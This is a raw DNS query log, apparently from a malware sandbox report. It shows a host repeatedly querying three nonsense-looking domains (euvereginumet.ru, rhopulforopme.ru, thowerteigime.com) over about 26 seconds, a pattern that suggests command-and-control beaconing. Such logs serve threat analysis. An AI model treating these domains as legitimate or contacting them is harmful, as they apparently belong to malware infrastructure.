                        Apr 26, 2023 12:39:47.910164118 CEST192.168.2.21.1.1.10xec78Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.932490110 CEST192.168.2.21.1.1.10xcd24Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.211174965 CEST192.168.2.21.1.1.10x7a07Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.235518932 CEST192.168.2.21.1.1.10x40c7Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.261284113 CEST192.168.2.21.1.1.10x9eb3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.549436092 CEST192.168.2.21.1.1.10x9b8cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.573126078 CEST192.168.2.21.1.1.10x1042Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.596141100 CEST192.168.2.21.1.1.10x79e1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.918684959 CEST192.168.2.21.1.1.10x7d3cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.941415071 CEST192.168.2.21.1.1.10xc65dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.966664076 CEST192.168.2.21.1.1.10xf3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.234384060 CEST192.168.2.21.1.1.10x621cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.390918016 CEST192.168.2.21.1.1.10xd9d5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.414436102 CEST192.168.2.21.1.1.10x8531Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.744971037 CEST192.168.2.21.1.1.10x228cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.768004894 CEST192.168.2.21.1.1.10x61aaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.790781021 CEST192.168.2.21.1.1.10xf871Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.063132048 CEST192.168.2.21.1.1.10xa380Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.085740089 CEST192.168.2.21.1.1.10x45f4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.111629009 CEST192.168.2.21.1.1.10x2a50Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.479494095 CEST192.168.2.21.1.1.10xcbc2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.503282070 CEST192.168.2.21.1.1.10xb81cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.528803110 CEST192.168.2.21.1.1.10xbc8dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.973819971 CEST192.168.2.21.1.1.10x5202Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.998435020 CEST192.168.2.21.1.1.10xd8deStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.024601936 CEST192.168.2.21.1.1.10x7fe4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.445899010 CEST192.168.2.21.1.1.10xcc3aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.471163034 CEST192.168.2.21.1.1.10x7880Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.500432014 CEST192.168.2.21.1.1.10x9137Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.971822023 CEST192.168.2.21.1.1.10xce48Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.996325016 CEST192.168.2.21.1.1.10x2b55Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.021647930 CEST192.168.2.21.1.1.10x37b2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.406902075 CEST192.168.2.21.1.1.10x879Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.437316895 CEST192.168.2.21.1.1.10x841cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.461044073 CEST192.168.2.21.1.1.10x90bbStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.830590010 CEST192.168.2.21.1.1.10x30e5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.861413956 CEST192.168.2.21.1.1.10xef52Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.889728069 CEST192.168.2.21.1.1.10x1078Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.196815014 CEST192.168.2.21.1.1.10x3a1dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.220861912 CEST192.168.2.21.1.1.10x4da0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.246109962 CEST192.168.2.21.1.1.10xf38Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.523694038 CEST192.168.2.21.1.1.10x7a7fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.547945023 CEST192.168.2.21.1.1.10xa0e8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.571973085 CEST192.168.2.21.1.1.10xc521Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.945209026 CEST192.168.2.21.1.1.10x5fd8Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.972563028 CEST192.168.2.21.1.1.10x39f9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.996865988 CEST192.168.2.21.1.1.10xf790Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.244370937 CEST192.168.2.21.1.1.10xfea3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.267894030 CEST192.168.2.21.1.1.10x987eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.298515081 CEST192.168.2.21.1.1.10xf29eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.678462982 CEST192.168.2.21.1.1.10xc7b3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.702570915 CEST192.168.2.21.1.1.10x4ae2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.737612963 CEST192.168.2.21.1.1.10x138cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.983362913 CEST192.168.2.21.1.1.10x47d7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.012964010 CEST192.168.2.21.1.1.10x8c2cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.035898924 CEST192.168.2.21.1.1.10x13aaStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.363281965 CEST192.168.2.21.1.1.10xf2a2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.391248941 CEST192.168.2.21.1.1.10x1fb0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.418618917 CEST192.168.2.21.1.1.10xbb7cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.664350033 CEST192.168.2.21.1.1.10x6bb0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.692841053 CEST192.168.2.21.1.1.10x9f20Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.716710091 CEST192.168.2.21.1.1.10x4187Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.053658009 CEST192.168.2.21.1.1.10xf0b4Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.081125975 CEST192.168.2.21.1.1.10x504dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.108582020 CEST192.168.2.21.1.1.10x4350Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.346709013 CEST192.168.2.21.1.1.10x6bb0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.369335890 CEST192.168.2.21.1.1.10x1956Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.399204016 CEST192.168.2.21.1.1.10x4203Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.688631058 CEST192.168.2.21.1.1.10x8bdaStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.711631060 CEST192.168.2.21.1.1.10xd40Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:56.831353903 CEST192.168.2.21.1.1.10xd626Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.075263023 CEST192.168.2.21.1.1.10x53aeStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.098506927 CEST192.168.2.21.1.1.10x649dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.121539116 CEST192.168.2.21.1.1.10x71a7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.483131886 CEST192.168.2.21.1.1.10x8242Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.508858919 CEST192.168.2.21.1.1.10x6debStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:57.533730984 CEST192.168.2.21.1.1.10xbb97Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.011830091 CEST192.168.2.21.1.1.10x3338Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.065273046 CEST192.168.2.21.1.1.10x45ceStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.096985102 CEST192.168.2.21.1.1.10xc889Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.431158066 CEST192.168.2.21.1.1.10xde0fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.462682962 CEST192.168.2.21.1.1.10xbaf1Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.486794949 CEST192.168.2.21.1.1.10x6541Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.776343107 CEST192.168.2.21.1.1.10x595eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.804981947 CEST192.168.2.21.1.1.10xcf31Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:58.828278065 CEST192.168.2.21.1.1.10x4970Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.109555006 CEST192.168.2.21.1.1.10x4a1aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.142795086 CEST192.168.2.21.1.1.10x9cedStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.183003902 CEST192.168.2.21.1.1.10x6482Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.487401962 CEST192.168.2.21.1.1.10x1fefStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.511059046 CEST192.168.2.21.1.1.10xb66bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.534590006 CEST192.168.2.21.1.1.10x9214Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.824042082 CEST192.168.2.21.1.1.10xab64Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.850864887 CEST192.168.2.21.1.1.10x2f07Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:59.881144047 CEST192.168.2.21.1.1.10xd35bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.242012978 CEST192.168.2.21.1.1.10xcfa1Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.274236917 CEST192.168.2.21.1.1.10x6e64Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.302130938 CEST192.168.2.21.1.1.10x870fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.608036041 CEST192.168.2.21.1.1.10xa1c6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.632791042 CEST192.168.2.21.1.1.10x604eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.657942057 CEST192.168.2.21.1.1.10x159cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.934662104 CEST192.168.2.21.1.1.10xc4a5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:00.958791971 CEST192.168.2.21.1.1.10x810dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.005685091 CEST192.168.2.21.1.1.10x9058Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.279124022 CEST192.168.2.21.1.1.10xb8b6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.303445101 CEST192.168.2.21.1.1.10xc763Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.326536894 CEST192.168.2.21.1.1.10x8c5eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.567759991 CEST192.168.2.21.1.1.10x8d43Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.593575954 CEST192.168.2.21.1.1.10x9c5fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.617696047 CEST192.168.2.21.1.1.10x5c75Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.907332897 CEST192.168.2.21.1.1.10x6dcfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.936002970 CEST192.168.2.21.1.1.10x20d8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:01.960779905 CEST192.168.2.21.1.1.10x2ac6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.235805988 CEST192.168.2.21.1.1.10xc41eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.259602070 CEST192.168.2.21.1.1.10xc45fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.282689095 CEST192.168.2.21.1.1.10x1677Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.551656961 CEST192.168.2.21.1.1.10xf214Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.575036049 CEST192.168.2.21.1.1.10xff45Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.603950977 CEST192.168.2.21.1.1.10xff9fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.881448984 CEST192.168.2.21.1.1.10x7619Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.906963110 CEST192.168.2.21.1.1.10x7565Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:02.930972099 CEST192.168.2.21.1.1.10xfe03Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.237447023 CEST192.168.2.21.1.1.10xc7aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.260874033 CEST192.168.2.21.1.1.10x2cb6Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.283477068 CEST192.168.2.21.1.1.10xbb16Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.543631077 CEST192.168.2.21.1.1.10xf57bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.567796946 CEST192.168.2.21.1.1.10xaae0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.597349882 CEST192.168.2.21.1.1.10x6779Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.876730919 CEST192.168.2.21.1.1.10xe8a9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.900304079 CEST192.168.2.21.1.1.10x31ddStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:03.924632072 CEST192.168.2.21.1.1.10x9deaStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.230150938 CEST192.168.2.21.1.1.10xbc7fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.257453918 CEST192.168.2.21.1.1.10x167cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.285900116 CEST192.168.2.21.1.1.10x3191Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.602565050 CEST192.168.2.21.1.1.10xe99cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.625449896 CEST192.168.2.21.1.1.10xdd2bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.648539066 CEST192.168.2.21.1.1.10x242fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.963378906 CEST192.168.2.21.1.1.10x8b88Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:04.992549896 CEST192.168.2.21.1.1.10x8e15Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.028901100 CEST192.168.2.21.1.1.10x7c28Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.351844072 CEST192.168.2.21.1.1.10xbd1aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.381412983 CEST192.168.2.21.1.1.10x6569Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.407363892 CEST192.168.2.21.1.1.10x8980Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.702994108 CEST192.168.2.21.1.1.10xf955Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.726197958 CEST192.168.2.21.1.1.10x17a4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:05.755800962 CEST192.168.2.21.1.1.10xcc84Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.064013004 CEST192.168.2.21.1.1.10x149dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.086741924 CEST192.168.2.21.1.1.10x1168Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.111556053 CEST192.168.2.21.1.1.10xfbcfStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.448641062 CEST192.168.2.21.1.1.10xa7b8Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.476901054 CEST192.168.2.21.1.1.10xbadbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.505538940 CEST192.168.2.21.1.1.10x5c58Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.811912060 CEST192.168.2.21.1.1.10xe64dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.835901022 CEST192.168.2.21.1.1.10x5c86Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:06.873729944 CEST192.168.2.21.1.1.10xf13fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.187882900 CEST192.168.2.21.1.1.10xc5abStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.218770981 CEST192.168.2.21.1.1.10x439Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.247879982 CEST192.168.2.21.1.1.10xdabfStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.521564007 CEST192.168.2.21.1.1.10xa864Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.545217991 CEST192.168.2.21.1.1.10xce86Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.589942932 CEST192.168.2.21.1.1.10x26f8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.880321026 CEST192.168.2.21.1.1.10x2365Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.904104948 CEST192.168.2.21.1.1.10xc22fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:07.933537006 CEST192.168.2.21.1.1.10x2d94Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.204114914 CEST192.168.2.21.1.1.10x4da9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.234803915 CEST192.168.2.21.1.1.10x9ff6Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.261389017 CEST192.168.2.21.1.1.10xfc25Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.571024895 CEST192.168.2.21.1.1.10x4f64Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.595691919 CEST192.168.2.21.1.1.10xb806Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:08.686326981 CEST192.168.2.21.1.1.10xf75eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.060651064 CEST192.168.2.21.1.1.10xbac5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.083736897 CEST192.168.2.21.1.1.10x3e9bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.113565922 CEST192.168.2.21.1.1.10xead0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.415731907 CEST192.168.2.21.1.1.10xecdfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.442955017 CEST192.168.2.21.1.1.10x7e57Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.474440098 CEST192.168.2.21.1.1.10x69c2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.761179924 CEST192.168.2.21.1.1.10xa042Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.789184093 CEST192.168.2.21.1.1.10x6860Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:09.814057112 CEST192.168.2.21.1.1.10x67e3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.117129087 CEST192.168.2.21.1.1.10x4758Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.141812086 CEST192.168.2.21.1.1.10xa3e0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.181392908 CEST192.168.2.21.1.1.10xf7beStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.472026110 CEST192.168.2.21.1.1.10x2562Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.499401093 CEST192.168.2.21.1.1.10xb9beStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.531063080 CEST192.168.2.21.1.1.10x922bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.778938055 CEST192.168.2.21.1.1.10xe61fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.806576014 CEST192.168.2.21.1.1.10x766dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:10.828820944 CEST192.168.2.21.1.1.10xd57dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.175384045 CEST192.168.2.21.1.1.10x91e2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.203403950 CEST192.168.2.21.1.1.10xcdfaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.231336117 CEST192.168.2.21.1.1.10xd8faStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.743014097 CEST192.168.2.21.1.1.10x8591Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.771884918 CEST192.168.2.21.1.1.10xc45fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:11.803658962 CEST192.168.2.21.1.1.10x29d2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.211102009 CEST192.168.2.21.1.1.10x7bb8Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.233937979 CEST192.168.2.21.1.1.10x5c67Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.256838083 CEST192.168.2.21.1.1.10xb30bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.699165106 CEST192.168.2.21.1.1.10xbcafStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.722466946 CEST192.168.2.21.1.1.10xd7c2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:12.745471001 CEST192.168.2.21.1.1.10x5780Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.085133076 CEST192.168.2.21.1.1.10xa922Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.108922958 CEST192.168.2.21.1.1.10xca3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.133080959 CEST192.168.2.21.1.1.10x2f6fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
